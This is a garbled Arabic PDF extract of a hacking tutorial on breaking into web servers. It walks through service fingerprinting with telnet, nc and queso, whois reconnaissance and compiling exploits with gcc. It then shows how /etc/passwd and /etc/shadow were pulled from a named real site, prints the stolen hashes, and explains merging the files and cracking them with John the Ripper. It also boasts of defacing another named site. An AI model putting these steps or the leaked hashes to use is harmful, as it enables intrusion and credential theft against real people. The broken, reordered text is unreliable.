‫‪                                                                   7.5 SunOS‬‬ ‫‪                                                  ­­­­­­­­­­­­­­­­­­­­­­ : login‬‬ ‫‪                                      662‬‬ ‫يتضح بأن السیرفر يعمل على نظام? ‪ SunOS 7.5‬بقي علیك أن تنتزع التواقیع‪ ‬‬ ‫من البورتات المتبقیه لتعرف ما ھ و التطبیق وإصدارته المنصت لھا (إستخدم‪    ‬‬ ‫التلنت ) ? وثم تقوم ببحث عن نقاط ضعف لھا وتحصل على شیفرات الستثمار‬ ‫الخاصه بھا ? الخطوه التالیه ھي أن تعرف ما ھو ملقم الويب الذي يعمل على‪ ‬‬ ‫ھذا النظام ? نذھب الى الترمینال تبع لیونكس ونكتب‪                         ‬‬ ‫‪                                            80 http://www.7lem.com/nc‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪                                                       ‬‬ ‫‪                                                                            .‬‬ ‫‪                                                                            .‬‬ ‫‪                                                                            .‬‬ ‫‪                                                     Apache/1.3.* Server‬‬ ‫‪                                                                            .‬‬ ‫‪                                                                            .‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪                                                       ‬‬ ‫أختصرت النتیجه وتم تضلیل إصدار ملقم الويب وذلك لحمايه الموقع ? اتمنى أن‬ ‫تستطیع كشفه بنفسك ‪                                                 ...‬‬ ‫من المعروف من عملیه السكان بورت بأن البورتین ‪ 52 ? 011‬مفتوحین ? ھذا‪  ‬‬ ‫يدل على أن في الموقع خدمة البريد اللكتروني ? بالطبع ھذا يفیدك لمعرفه‪   ‬‬ ‫‪smtp ? pop‬للموقع ? كل ماعلیك فعله ھو كتابه المر التالي (في ( ‪    Linux‬‬ ‫‪                                                           host 7lem.com‬‬ ‫وأنتظر النتائج‪                                                                ‬‬ ‫ملحظه ‪ -:‬إذا كنت تعیش مع بن لدن ولست عائش في جو تقنیه معلومات‪   ‬‬ ‫كل ما علیك فعله ھ و تفجیراليمیل (على حسب ما يسمیھا كثیر من الناس (‪ ‬‬ ‫ملحظه ثانیه ‪ -:‬إذا لم تجد في السیرفر خدمه تلنت أو أنه تم تغییر التوقیع عن‬ ‫طريق مثل قرصنه النظام ‪....‬الخ ? علیك أن تستخدم ‪ queso‬الداة المفضله‪    ‬‬ ‫لكشف نظام التشغیل ? وھي تعمل على لیونكس ? لستخدامھا علیك كتابه‪ ‬‬ ‫‪                                           http://www.7elm.com/queso‬‬ ‫‪                                    762‬‬ ‫كل ماعلیك بعد تثبیت الداة في جھازك ھو كتابه ‪ queso‬وثم مسافه والموقع‪  ‬‬ ‫ورقم البورت ‪ 08‬والذي ھو بطبیعه الحال مفتوح في جمیع المواقع‪...‬يأتیك الرد‪  ‬‬ ‫بأن النظام ‪                                                       SunOS 7.5‬‬ ‫لو أردت مثل قائمة بالبريدات الموجوده في موقع ‪ http://www.alzeer.net /‬مثل‬ ‫‪( support‬أو ‪ webmaster‬أو‪ info ...‬الخ ) أو أدرت معرفه الـ ‪ DNS‬الولي‪        ‬‬ ‫والثانوي للموقع ? أو من ھو الشخص اللي سجل ومعلومات عنه وما ھي‪      ‬‬


‫الشركه التي تستظیف الموقع ? علیك بإستخدام خدمه ? ‪ whois‬تستطیع‪     ‬‬ ‫إستخدام خدمه ‪ whois‬وتطلب معلومات من قواعد بیانات ‪ whois‬عن طريق أمر‬ ‫‪whois‬في لینكس ? أكتب ‪ man whois‬لمزيد من المعلومات ? إذا كنت‪         ‬‬ ‫تستخدم ويندوز أو أي بیئه أخرى أنصحك بالتوجه الى برمجیات السي جي آي‬ ‫المتواجد في الموقع‪                                                         ‬‬ ‫‪                                  http://www.psyon.org/tools/index.html‬‬ ‫توفر لك ھ ذه الصفحه مجموعه من برمجیات السي جي آي التي تسھل لك‪   ‬‬ ‫المھمه ? ھناك رياضیات لطلب معلومات عن موقع ويب بإستخدام ‪ whois‬وھي‬ ‫مفیده جدا ? على كل حال توجه الى الموقع التالي لمزيد من التفاصیل‪        ‬‬ ‫‪        http://www.google.com/search?q=whois&btnG=Google+Search‬‬ ‫كیف يتم كشف نقاط الضعف ?‪                                             ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‪                             ‬‬ ‫ل تستخدم برامج مثل ‪ void eye‬أو ‪ ShadowSecurityScaner‬ھذه للمغفلین‪   ‬‬ ‫فقط!!? المحترفین واللي يبغا يكون محترف ل يستخدم برامج في عملیات‪      ‬‬ ‫الختراق ? ول يخترق لمجرد أنه يبغا يخترق ? عملیه إختراق سیرفر تمتاز‪      ‬‬ ‫بالدقه المتناھ یه ? والتخطیط المحكم ? وكل عملیات السطو المحكمه ھي‪    ‬‬ ‫التي يصعب إكتشاف مرتكبیھ ا ? لكن واالله لو كنت من اللي يشغل برنامج‪      ‬‬ ‫ومايدري االله وين حاطه فصدقني إنك ماراح تفلح طول عمرك ? ھذا لو قدرت‪    ‬‬ ‫تخترق شئ ? فلو حدث وتم الختراق بواحد من ھ ذه البرامج فسوف تصطاد‪   ‬‬ ‫بسناره تماما كالسمكه‪                                                      ‬‬ ‫نقاط الضعف المفضله والتي تعتبر كأسرار ول يكشف عنھا ال بعد فتره طويله‪   ‬‬ ‫ھي التي في ملقم الويب مثل ‪ Apache‬أو ? ‪ IIS‬وكذلك نقاط الضعف الموجوده‬ ‫في سكربتات ‪ CGI‬و ‪ Perl‬و ? ‪  PHP‬أو التي قد تكون موجوده في البرنامج‪       ‬‬ ‫المستخدم لتفسیر نصوص البیرل أو السي جي آي ? وإذا كان في الموقع‪     ‬‬ ‫برنامج لتسوق مثل من الممكن أن تستغل فیه نقطه ضعف ھذا إذا وجدت به ?‬ ‫يعني اي شئ في السیرفر سوى كان سكربت بیرل أو سي جي آي‪..‬أو كان‪  ‬‬ ‫‪                                    862‬‬ ‫برنامج تنفیدي أو حتى نظام التشغیل أو ملقم الويب مصاب بنقطه ضعف من‪  ‬‬ ‫الممكن أن يعرض السیرفر للختراق ويعرض كل ما بداخله من أسرار الى‪      ‬‬ ‫المخترق‪                                                                      ‬‬ ‫}‪ .cgi } http://www.fbunet.de/cgibin/nph -‬ھذا ? ‪ CGI‬ل تستغرب ? ھذه‪  ‬‬ ‫ھي الحركات الجديده لنشر ال‪                                                 ‬‬ ‫نكمل الموضوع ‪                                                             ....‬‬ ‫لنأخذ مثال ‪ :‬الموقع ‪ timduff.com‬ھذا موقع يستحق التدمیر ? وقد تم ذلك ?‪  ‬‬ ‫وھ و الن تم إرجاعه ولكن من جديد ول يحوي ال القلیل من الصفحات ل تتجاوز‪ ‬‬ ‫إثنتان‪                                                                          ‬‬ ‫الن سوف أضع النقاط الساسیه لكشف نقاط ضعف على موقع ما ‪          :-‬‬ ‫‪1‬التعرف على كافه الخدمات الموجوده على السیرفر‪                         ‬‬‫‪2‬معرفه نظام التشغیل وإصدارته وكذلك ملقم الويب وأي برمجیات أخرى مثل‪ ‬‬‫مفسر نصوص بیرل إذا كان ذلك ممكن ? أو برنامج للبیع والشراء‪ .....‬الخ‪        ‬‬ ‫‪3‬عمل جلسه للتقاط كل السكربتات ( ‪ ( Perl ­ Cgi‬الموجوده في الموقع ?‪  ‬‬‫ھذا إذا وجد شئ منھا‪                                                         ‬‬ ‫‪4‬ولتنسى تحط البورتات معھا ? لنه أحیانا يكون في البورت نقطه ضعف ?‪    ‬‬‫لیس ھذا صحیحا ‪ %001‬نقطه الضعف لیست في البورت بعینه ? في البرنامج‪ ‬‬ ‫اللي مصلح إنصات للبورت (ھذا أقرب تعبیر لھا (‪                                ‬‬ ‫‪5‬أخیرا يمكنك الستفاده من المعلومات التي حصلت علیھا في البحث عن‪   ‬‬‫نقاط ضعف‪                                                                     ‬‬ ‫كیف يمكن إستغلل نقاط الضعف المكتشفه ?‪                                ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‪      ‬‬ ‫أبسط الثغرات والتي يستطیع أي مبتدي أن يستخدمھا ھي تلك التي تنفذ من‬


‫خلل المتصفح? مثل المثال السابق ذكره لختراق الموقع‪                      ‬‬ ‫‪                                                    /http://www.timduff.com‬‬ ‫‪                                       962‬‬ ‫نوع آخر ? يكون الستثمار (من الن سوف نطلق إسم إستثمار على الطريقه‪  ‬‬ ‫التي تستغل بھا الثغره) يكون الستثمار على شكل شفره (كود) مكتوب‪      ‬‬ ‫ببرنامج ‪ sh‬في لیونكس ? وھ و ما يسمى بالعربي برنامج الغلف وبالنجلیزي‪  ‬‬ ‫‪shell‬وتكون ھذه الشفره تحت ملف بالمتداد ‪ *.sh‬وتعمل تحت بیئه لیونكس ?‬ ‫وھذا النوع من الستثمارات ھ و المفضل ويحسس المخترق بالقوه ونظرا لتعدد‪ ‬‬ ‫الداوت في لیونكس فإن لغه ‪ shell‬اصبحت قويه فھي تقابل كتابه ملف دفعاتي‬ ‫في ويندوز (‪                                                            (bat‬‬ ‫ويوجد نوع من الستثمارات ثاني وھو شفره (كود) مكتوب بلغه ‪ C‬المشھوره ?‪ ‬‬ ‫وھ ذا النوع غالبا ما تحدث فیه أخطأ أثناء عملیه الترجمه ? قد تواجه كثیر من‪   ‬‬ ‫المتاعب لذلك يجب أن تكون لديك خلفیه في لغه سي ? ولترجمه ھذا النوع‪   ‬‬ ‫علیك بالذھ اب الى لیونكس وترجمته بإستخدام المترجم ‪                   gcc‬‬ ‫‪                                                  gcc Exploit.c ­o Exploit‬‬ ‫ملحظه مھ مه ( يجب أن يكون المتداد للمف ‪ *.c‬ولیس ? ‪ *.C‬لو كان حرف ‪  c‬‬ ‫كبتل فسوف يترجم الستثمار وكأنه كتب في سي ? ‪ ++‬الشئ الثاني تأكد‪  ‬‬ ‫من توفر المكتبات (‪ (*.h‬التي يتطلبھا الستثمار قبل تشغیله)‪                  ‬‬ ‫يوجد نوع ظھ ر مؤخرا من الستثمارات وبداء ينتشر وھو أيضا شفره ولكن‪       ‬‬ ‫مكتوبه بلغه ‪ Perl‬ومن الممكن أن يتم تشغیل ھذا النوع من موجه الدوس في‪ ‬‬ ‫ويندوز (يجب أن تملك برنامج يفسر شفرات البیرل مثل أكتیف بیرل)‪            ‬‬ ‫وأحیرا انواع نادره من الستثمارات قد تكون على شكل خطوات ‪             ....‬‬ ‫= ‪Exploit‬إستثمار‪                                                         ‬‬ ‫ماھو ملف كلمة المرور ‪ password file‬؟‪                                    ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‪            ‬‬ ‫ملف كلمة المرور معروف من إسمه ? ھو الذي في داخله توجد حسابات‪      ‬‬ ‫الشخاص المرخص لھم بالدخول الى السیرفر ? مثل ھذا‪                      ‬‬ ‫‪                                    072‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪                                                                            ‬‬ ‫‪ root:x:0:1:Super­User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪         sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪                                       Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪                           Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico‬‬ ‫‪                                   listen:x:37:4:Network Admin:/usr/net/nls:‬‬ ‫‪ nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access‬‬ ‫‪                     User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:‬‬ ‫‪                                              www:x:102:1001::/web:/bin/csh‬‬ ‫‪                     mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬ ‫‪                                     sid:x:103:10::/export/home/sid:/bin/ksh‬‬ ‫‪                                         mirror:x:104:1::/home/mirror:/bin/sh‬‬ ‫‪                                         admin:x:105:1::/home/admin:/bin/sh‬‬ ‫‪ jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬ ‫‪                            landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­‪­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫­­­­­­­­­­‪                                                                            ‬‬ ‫وقد تكون أكثر بكثیر ? حیث أن ھ ذا الملف الموضح بالعلى أختصر بشكل كبیر‪  ‬‬ ‫? فعند سحبه كان يحتوي على آللف السطور ? لیس كل ملفات كلمات المرور‬ ‫بھ ذا الحجم فیوجد منھا من ل يتجاوز ‪ 01‬أسطر وھي الموجوده بكثره ? على‪   ‬‬


‫العموم أنت الحین علیك تعرف بأن ملف كلمة المرور ھو الذي في داخله توجد‪  ‬‬ ‫حسابات الشخاص المرخص لھم بالدخول الى السیرفر‪                    ...... ‬‬ ‫بماذا يفیدني ھذا الملف‪                                                        ? ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~‪                                 ‬‬ ‫يفیدك في معرفه كلمات السر وإسماء المستخدمین لكي تقوم بإختراق الموقع‬ ‫? ولكن لتفرح ‪ !...‬كلمة المرور تكون مشفره ? ل ھذا لیس صحیحا تماما‪     ? ‬‬ ‫كانت مشفره زمان ولكن في الوقت الحالي ھي مضلله‪                           ‬‬ ‫*او‪ x = ‬كلمة سر مضلله‪                                             Shadowed ‬‬ ‫‪                                         271‬‬ ‫= ‪EpGw4GekZ1B9U‬كلمة سر مشفره على مقیاس ? ‪ DES‬ھذا النوع من‪  ‬‬ ‫التشفیر المستخدم في لیونكس ‪ ? FreeBSD‬وعدد من النظمه الخرى ضعیف‬ ‫? وھو دائما مكون من ‪ 31‬حرف ورقم كبتل وسمول ول يحتوي من بینھا على‪  ‬‬ ‫رمز ابد ً ? بإستثناء ويندوز فھ و يستخدم نوع آخر من التشفیر وھو نوع ضعیف‪  ‬‬ ‫ا‪                                                                  ‬‬ ‫أيضا‪                                                                      ‬‬ ‫كیف يمكن معرفة كلمة السر من خلل ملف الباسورد ‪ password file‬؟‪      ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫إضغط ‪ Ctrl + Shift‬في القسم اليمن من لوحه المفاتیح لتقراء من الیسار الى‬ ‫الیمین ? ثم إذھ ب الى العلى حیث وضعت مثال لملف كلمة مرور تم سحبه‪ ‬‬ ‫من الموقع ‪                                             hwwilson.com ...‬‬ ‫تفسیر ھذا السطر ‪                                                     :-‬‬ ‫‪                                       root:x:0:1:Super­User:/:/sbin/sh‬‬ ‫‪                                                                     root‬‬ ‫ھ ذا السطر يوضخ المستخدم واللي ھو الجذر ‪                          root‬‬ ‫‪                                                                        x‬‬ ‫وكلمة المرور ? ويتضح انھا مضلله ? يعني مكانھا العلمة ? ‪ x‬ل تفكر في‪       ‬‬ ‫كسرھا فھ ذا مستحیل ? لكن علیك البحث عن ملف ثاني تم تخزين فیه كلمة‪ ‬‬ ‫المرور ? ستعرف بعد قلیل كیف تفعل ھذا‪                                   ‬‬ ‫‪                                                                        0‬‬ ‫ھذا ھو رقم المستخدم‪                                                   ‬‬ ‫‪                                                                        1‬‬ ‫رقم المجموعه‪                                                           ‬‬ ‫‪                                   272‬‬ ‫‪                                                            Super­User:/:/sbin/sh‬‬ ‫ھذا مش مھم‪                                                                       ‬‬ ‫ماالفرق بین إذا كان الملف (مشفر (‪ encryption‬وإذا كان (مضلل (‪shadowed‬‬‫?‪                                                                                     ‬‬ ‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫الملف المضلل ‪ shadow file‬يكون مكان كلمة المرور رمز مثل * أو ‪ x‬أو ‪ #‬أو !‪   ‬‬ ‫وھذا مثال لھا‪                                                                       ‬‬ ‫‪                                              root:x:0:1:Super­User:/:/sbin/sh‬‬ ‫لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل ھذه‪           ‬‬ ‫‪                           root:Q71KBZlvYSnVw:0:1:Super­User:/:/sbin/sh‬‬ ‫ھنا تكون كلمة المرور المشفره ھي ‪                          Q71KBZlvYSnVw‬‬ ‫الن طلعت الصوره صافیه ‪                                                       ....‬‬ ‫===========‪                                                                ‬‬ ‫وماذا لو كان ملف كلمة المرور مشفر ? كیف يتم كسره ?‪                       ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫البرامج كثیره وأشھرھا ھو ‪ Crack 5.0a‬و ‪ john the ripper‬ويوجد آخر بإسم‪    ‬‬ ‫? ‪ jack the ripper‬إذا كنت ممن يجیدون العمل في لیونكس فھذا جید ? علیك‪ ‬‬


‫تنزيل ? ‪ Crack 5a‬وأفضل ‪ john the ripper‬لمن يريد إستخدام ويندوز ?‪         ‬‬ ‫وللمعولمیه فإن ‪ john the ripper‬عمل أيضا تحت لیونكس ‪                  .....‬‬ ‫طريقه عمل ھذه البرامج ‪                                                         :-‬‬ ‫يقدم للبرنامج ‪ wordlist‬ويقوم بمطابقه الكلمات الموجوده به ? كما ھو موضح‪  ‬‬ ‫ھنا ‪                                                                                 .‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫‪                                            ­­­­­­< ­­­­­­­­­­ \ Q2wrtUo9LPq2R‬‬ ‫‪                                         372‬‬ ‫يتم مقارنه} ‪ | // >---‬البدايه} كلمة المرور ‪ | /---/‬المشفره مع | ‪ / 1 /‬أخذ‪    ‬‬ ‫كلمة من الـ ‪ wordlist‬الكلمات | ‪ / _____________ 0 /‬المختاره حتى |‪       ‬‬ ‫{تشفیر}‪ | | / 1 /‬يتم ‪ / \­­­­| word list | 0 / ---------^--------‬التطابق‪       ‬‬ ‫> ‪ Q6LiJ6ct1oUBz‬كلمة مرور مشفره ‪ /---/‬الكلمة المختاره |‪                  ‬‬‫\ ‪|_____________| ­­­­­­­­­­­­­­­­­­ //­­­­­­­­song------‬إذا حدث تطابق‪   ‬‬ ‫فھذا يعني أن‪                                                                        ‬‬ ‫كلمة المرور التي كانت مشفره‪                                                    ‬‬ ‫قد كسرت ‪                                                                         ..‬‬ ‫|‪  | ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫ملحظه مھ مه ‪ -:‬يتم عمل دوره مثل الموضحه في العلى لكسر كلمات المرور‬ ‫المشفره بسرعه‪                                                                    ‬‬ ‫}النھايه} | ‪ 0005‬تجربه في الثانیه (إختبرنا‪john the ripper‬على معالج بسرعه‬ ‫)‪                                                                                 007 ‬‬ ‫|‪    ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫لتشغیل ‪ john the ripper‬من واجه دوس نكتب المر التالي‪                     ‬‬ ‫‪                                                             john ­ordlist passwd‬‬ ‫حیث ‪ wordlist‬ھو ملف القاموس الذي يحتوي على عدد كبیر من الكلمات‪     ‬‬ ‫و ‪ passwd‬ھو الملف الذي يحتوي على كلمات المرور المشفره والتي نود‪      ‬‬ ‫معرفتھا‪                                                                               ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫‪                                                        89 Microsoft® Windows‬‬ ‫‪                                     (.8991­1891 C)Copyright Microsoft Corp‬‬ ‫‪              E:\Desktop\junk\john the ripper>john ­wasswd passwd.txt‬‬ ‫‪               6991 © by Sola 97,John the Ripper Version 1.3 Copyright‬‬ ‫‪                                                              Loaded 1 password‬‬ ‫‪            **v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬ ‫‪                                         472‬‬ ‫‪                                             >E:\Desktop\junk\john the ripper‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫وسوف تحفظ النتیجه في الملف ‪ john.pot‬الموجود في نفس الدايروكتري ?‪    ‬‬ ‫وعلیك حذف ھ ذا الملف إذا أردت البدء في عملیه كسر جديده ويمكنك تغییر‪   ‬‬ ‫إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى ذلك ‪                 ...‬‬ ‫ھناك طريقه اخرى للكسر وھي تسمى بـ ‪ brute force‬أو بالعربي القوه‪        ‬‬ ‫العنیفه ? وھي ل تحتاج لملف ? ‪ wordlist‬ھي تقوم بتجربه كل الحروف والرقام‬ ‫والرموز مع بعض في خانتان ?‪3‬خانات واربع وخمس ‪..‬الخ حتى تصیب كلمة‪     ‬‬ ‫المرور الصحیحه ? وأنا افضل ان تستخدم ملفات ‪ wordlist‬فذلك لن يأخذ معك‪  ‬‬ ‫في ال ثواني فقط لن عملیه التجربه الموضحه في الرسم بالعلى ذكرت بأنه‪ ‬‬ ‫سرعة تجربه الكلمات يتجاوز ‪ 0005‬كلمة في الثانیه ? إذا لم تفلح ملفات‪       ‬‬ ‫‪wordlist‬حینھا إذھب الى القوه العنیفه ‪                            brute force‬‬ ‫المر التالي يجعل ‪ john the ripper‬يستخدم طريقه ‪ brute force‬السابق‪      ‬‬ ‫ذكرھا‪                                                                                ‬‬ ‫‪                                                                    john ­i passwd‬‬


‫حیث ‪ passwd‬ھ و ملف كلمة المرور المراد كسره ? إذا قمت بتجربه ھذه‪        ‬‬ ‫الطريقه إضغط إنتر أثناء عمل البرنامج لترى الى أين توصل ‪                     ...‬‬ ‫ولو كان ملف كلمة المرور مضلل ? ماذا علي ان أعمل ?‪                         ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~‪                                                                                   ‬‬ ‫دائما سوف تواجه كلمة مرور مضلله ? لكن ھناك طريقه تسمى ‪   Unshadow‬‬ ‫لحل ھذه المشكله !!‪                                                              ‬‬ ‫إذا واجھ ت ملف مضلل علیك البحث عن ملف ثاني يسمى ملف الشادو (ملف‪ ‬‬ ‫الظل ‪                                                                ) shadow file‬‬ ‫وھ ذا الملف يوجد في امكنه معینه وكل نظام تشغیل له مكان يوضع به ھذا‪    ‬‬ ‫الملف ? الیك الجدول التالي ‪                                                      :‬‬ ‫‪                                         572‬‬ ‫*‪                                                Linux : /etc/shadow token = ‬‬ ‫=‪SunOS : /etc/shadow token ‬يأخذ أشكال متعدده اشھرھا ھو‪           * ‬‬ ‫*‪FreeBSD : /etc/master.passwd or /etc/shadow token = ‬والجديد ھو‪  x ‬‬ ‫‪                                                  IRIX : /etc/shadow token = x‬‬ ‫!‪                                         AIX : /etc/security/passwd token = ‬‬ ‫*‪                       ConvexOS : /etc/shadow or /etc/shadpw token = ‬‬ ‫‪token‬تعني الرمز الذي يوجد في الملف‪ passwd ? ‬وھذا يفید في تسھیل‪     ‬‬ ‫المھ مه ? يعني لو مثل لقیت علمه ! بدل كلمه المرور فھذا يعني ان كلمة‪     ‬‬ ‫المرور مسجله في‪ /etc/security/passwd ? ‬لقد إستعنت بالجدول السابق‪    ‬‬ ‫ذكره ? مثال على ملف شادو (أكرر ملف شادو ھ و الملف الذي تخزن فیه كلمة‪ ‬‬ ‫المرور الصحیحه‪                                                                   ( ‬‬ ‫ھذا ملف‪                                                                  shadow ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪                                                                           ‬‬ ‫‪ root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::‬‬ ‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬ ‫‪                                                                  lp:NP:6445::::::‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪                                                                           ‬‬ ‫نلحظ ان كلمات السر موجوده‪                                                     ‬‬ ‫الخطوه الخیره وھي دمج ملف الباسورد‪ passwd file ‬مع‪    shadow passwd ‬‬ ‫لنحصل على ملف متكامل ونقدمه الى برامج الكسر السابق ذكرھا‪         ... ‬‬ ‫ھذا ملف باسورد حصلنا علیه من‪                                                  ‬‬ ‫‪                               http://wilsonweb2.hwwilson.com/etc/passwd‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪                                                                           ‬‬ ‫‪ root:x:0:1:Super­User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪         sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪                                       Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪                                         276‬‬ ‫‪                          Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico‬‬ ‫‪                                    listen:x:37:4:Network Admin:/usr/net/nls:‬‬ ‫‪nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access‬‬ ‫‪                    User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:‬‬ ‫‪                                               www:x:102:1001::/web:/bin/csh‬‬ ‫‪                    mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬ ‫‪                                      sid:x:103:10::/export/home/sid:/bin/ksh‬‬


‫‪                                          mirror:x:104:1::/home/mirror:/bin/sh‬‬ ‫‪                                          admin:x:105:1::/home/admin:/bin/sh‬‬ ‫‪ jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬ ‫‪                          landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪                                                                            ‬‬ ‫ومن الـ‪ token ‬الموضح واللي ھو‪ x ‬نعرف من خلل الجدول السابق ذكره بأن‪   ‬‬ ‫كلمة المرور الصحیحه في الدلیل‪                                   /etc/shadow ‬‬ ‫إذن نتوجه بالمتصفح الى‪                                                            ‬‬ ‫‪                                http://wilsonweb2.hwwilson.com/etc/shadow‬‬ ‫لنحصل على الملف‪                                                                  ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫­­­­­­­­­­‪                                                                            ‬‬ ‫‪                 root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445::::::‬‬ ‫‪bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445::::::‬‬ ‫‪              smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445::::::‬‬ ‫‪          listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445::::::‬‬ ‫‪                   nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507::::::‬‬ ‫‪    mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515::::::‬‬ ‫‪                                            mirror:iMPWwbrU.gB4k:10601::::::‬‬ ‫‪                                          admin:hDhB5YYKyWgQw:10976::::::‬‬ ‫‪     jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982::::::‬‬ ‫‪                                         landmark:0jCgWu6vl8g0s:11185::::::‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪                                                                            ‬‬ ‫‪                                          277‬‬ ‫نقوم بنسخ كلمات السر الموجوده فیه ولصقھا مكان علمه ‪ x‬في ملف‪  ‬‬ ‫الباسورد ? وھ كذا مع جمیع الحسابات لنحصل على ملف كلمة مرور كامل‬ ‫ومتكامل ونقدمه الى برامج الكسر‪                              ...‬‬ ‫‪                          872‬‬ ‫كیفیة الختراق (الجزء الول)‪                ‬‬ ‫للكاتب‪                                                   mr_Shark96 :‬‬ ‫اول الموضوع ھ و كیفیة اختراق المواقع بطريقة عامة وقد قمت بجعل الموضوع‬ ‫قسمین‪                                                               ‬‬ ‫الول ‪ :‬كیفیة اختراق سیرفرا ‪                                  Apache‬‬ ‫الثاني ‪ :‬كیفیة اختراق سیرفرات ‪IIS‬التى تعمل تحت انظمة ‪     Windows‬‬ ‫والن ساتطرق الى الجزء الول وھ و كیفیة اختراق سیرفرات ‪       Apache‬‬ ‫_____________________________________________________‪   ‬‬ ‫الحتايجات‪                                                           :‬‬ ‫‪ -1‬نظام ‪Linux‬او شیل اكاونت او برنامج ‪                      Cygwin‬‬ ‫‪ -2‬برنامج ‪                                                    nmap‬‬ ‫‪ -3‬برنامج ‪                                                    netcat‬‬ ‫____________________________________________________‪    ‬‬ ‫عندما تريد اختراق موقع ولیكن ‪ WWW.MSN.COM‬وعند الذھاب الى موقع‪  ‬‬ ‫‪ 